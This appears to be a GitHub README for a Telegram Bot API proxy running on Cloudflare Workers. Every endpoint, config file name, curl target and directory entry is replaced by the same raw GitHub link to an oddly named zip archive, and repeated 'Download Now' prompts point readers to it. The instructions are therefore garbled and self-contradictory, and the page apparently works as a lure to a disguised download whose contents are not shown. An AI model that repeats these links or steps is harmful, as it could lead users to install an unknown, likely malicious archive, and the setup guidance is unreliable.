Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ BOT - Simple Telegram Bot API Proxy

πŸ“₯ Download Now

Download BOT

πŸ“– Overview

BOT allows you to access the Telegram Bot API through Cloudflare Workers. This service helps users in restricted regions to connect easily without server costs.

🌟 Key Features

  • Proxy for all Telegram Bot API calls.
  • Optimized for use in areas with access limitations.
  • Zero server cost involved.
  • Custom API Endpoint: https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip

πŸš€ Getting Started

1. Visit the Releases Page

To begin, head over to the Releases page to download the latest version of BOT.

2. Install Wrangler

Before using BOT, you need to install Wrangler. This tool helps with managing Cloudflare Workers. Run this command in your terminal:

npm install -g wrangler

3. Configure Your BOT Token

You need to provide your Telegram Bot Token for the application to work. Edit the https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip file. Open the file and add your token like this:

BOT_TOKEN = "123456:ABCDEF"

Alternatively, you can set the token using a command:

wrangler secret put BOT_TOKEN

4. Deploy Your App

Once your token is in place, you can deploy the application using the following command:

wrangler publish

After this step, your Telegram Bot API will be accessible at:

https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip

This URL can also be used with Telegram client webhooks.


πŸ’¬ Example: Sending a Message

You can test the bot by sending a message through CURL. Replace https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip and chat_id with actual values:

curl "https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip"

This command will send "hello" to the specified chat.


πŸ“ Directory Structure

Here’s what your project should look like:

https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip

⚠️ Important Notes

This worker does not store any data. It only functions as a simple reverse proxy, ensuring user privacy and security.

πŸ“₯ Download & Install

For the full experience, download BOT from the Releases page. Follow the setup instructions above to get your Telegram Bot running in no time.


If you need further assistance or documentation, feel free to explore the repository. Your seamless messaging experience awaits!

About

🌐 Proxy the Telegram Bot API via Cloudflare Worker to bypass access restrictions in local environments with zero server costs and customizable endpoints.

Topics

Resources

Stars

Watchers

Forks

Releases

Packages

Contributors

Languages